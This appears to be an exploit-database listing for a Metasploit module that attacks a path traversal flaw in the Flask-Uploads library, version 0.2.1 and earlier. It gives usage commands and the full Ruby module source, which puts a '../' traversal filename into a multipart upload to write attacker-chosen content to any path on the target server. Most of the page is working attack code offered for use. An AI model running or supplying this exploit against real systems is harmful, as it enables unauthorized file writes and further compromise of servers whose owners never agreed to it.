Share
## https://sploitus.com/exploit?id=PACKETSTORM:214818
=============================================================================================================================================
    | # Title     : Flask-Uploads <= 0.2.1 Path Traversal to Arbitrary File Write                                                               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://github.com/maxcountryman/flask-uploads                                                                              |
    =============================================================================================================================================
    
    [+] References :  https://packetstorm.news/files/id/214228/ 
    
    [+] Summary    :  This Metasploit module exploits a path traversal vulnerability in the Flask-Uploads library versions 0.2.1 and earlier.
                      The issue stems from insufficient sanitization of the name parameter used in the save() method of the UploadSet class, 
    				  allowing an attacker to traverse directories and write arbitrary files outside the intended upload directory.
                      The module is designed strictly to demonstrate arbitrary file write capability and does not assume or attempt remote code execution. 
    				  File execution depends entirely on application logic, server configuration, and file placement, which are intentionally left out of scope.
                      Successful exploitation may result in unauthorized file creation on the target filesystem, 
    				  potentially enabling further attacks when chained with additional vulnerabilities.
    
    [+] Usage : 
    
    use exploit/multi/http/flask_uploads_traversal
    set RHOSTS <TARGET_IP>
    set RPORT <TARGET_PORT>
    set TARGETURI /upload
    exploit
    
    [+] POC :
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
    
      Rank = AverageRanking
    
      include Msf::Exploit::Remote::HttpClient
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name'           => 'Flask-Uploads <= 0.2.1 Path Traversal Arbitrary File Write',
            'Description'    => %q{
              This module exploits a path traversal vulnerability in the Flask-Uploads 
              library (version 0.2.1 and prior). The vulnerability allows for arbitrary 
              file writes outside of the intended upload directory by manipulating the 
              'name' parameter passed to the save() function. This module focuses on 
              the file write primitive.
            },
            'Author'         => ['indoushka'],
            'License'        => MSF_LICENSE,
            'References'     => [
              ['URL', 'https://github.com/maxcountryman/flask-uploads/issues/43']
            ],
            'Privileged'     => false,
            'Platform'       => %w[linux win unix],
            'Arch'           => ARCH_ALL,
            'Targets'        => [['Generic Arbitrary File Write', {}]],
            'DisclosureDate' => '2024-10-25',
            'Notes'          => {
              'Stability'   => [CRASH_SAFE],
              'Reliability' => [], # No session guaranteed
              'SideEffects' => [ARTIFACTS_ON_DISK]
            }
          )
        )
    
        register_options([
          OptString.new('TARGETURI', [true, 'The vulnerable endpoint URL', '/upload']),
          OptString.new('FIELD_NAME', [true, 'The multipart field name for the file upload', 'files']),
          OptString.new('TRAVERSAL_DEPTH', [true, 'Depth of path traversal to reach root', '10']),
          OptString.new('REMOTE_PATH', [true, 'The target path on the remote system', '/tmp/pwned.txt']),
          OptString.new('FILE_CONTENT', [true, 'Content to write to the remote file', 'Vulnerability Confirmed'])
        ])
      end
    
      def check
    
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path)
        })
        return CheckCode::Unknown('No response from the target.') unless res
        
        if res.code == 200
          return CheckCode::Detected("Endpoint #{target_uri.path} is reachable.")
        end
    
        CheckCode::Safe
      end
    
      def exploit
    
        traversal = "../" * datastore['TRAVERSAL_DEPTH'].to_i
        remote_filename = datastore['REMOTE_PATH'].sub(%r{^/}, '')
        malicious_name = "#{traversal}#{remote_filename}"
    
        data = Rex::MIME::Message.new
    
        data.add_part(
          datastore['FILE_CONTENT'], 
          'text/plain', 
          nil, 
          "form-data; name=\"#{datastore['FIELD_NAME']}\"; filename=\"test.txt\""
        )
    
        data.add_part(malicious_name, nil, nil, "form-data; name=\"name\"")
    
        print_status("Attempting to write #{datastore['FILE_CONTENT'].length} bytes to #{datastore['REMOTE_PATH']}...")
    
        res = send_request_cgi({
          'method' => 'POST',
          'uri'    => normalize_uri(target_uri.path),
          'ctype'  => "multipart/form-data; boundary=#{data.bound}",
          'data'   => data.to_s
        })
    
        if res && res.code == 200
          print_good("Server responded with 200 OK. Verification required at: #{datastore['REMOTE_PATH']}")
        else
          status = res ? res.code : 'no response'
          fail_with(Failure::UnexpectedReply, "Server responded with #{status}. Exploitation failed.")
        end
      end
    end
    
    Greetings to :============================================================
    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
    ==========================================================================